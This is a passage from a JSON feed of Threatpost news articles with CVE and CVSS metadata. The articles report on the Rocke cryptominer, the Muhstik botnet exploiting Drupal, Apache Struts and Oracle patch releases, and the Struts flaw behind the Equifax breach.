Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "cvss3": {}, "published": "2018-08-30T20:35:39", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "modified": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe[ patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it ](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>)fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>),\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, for example, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird &amp; Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the 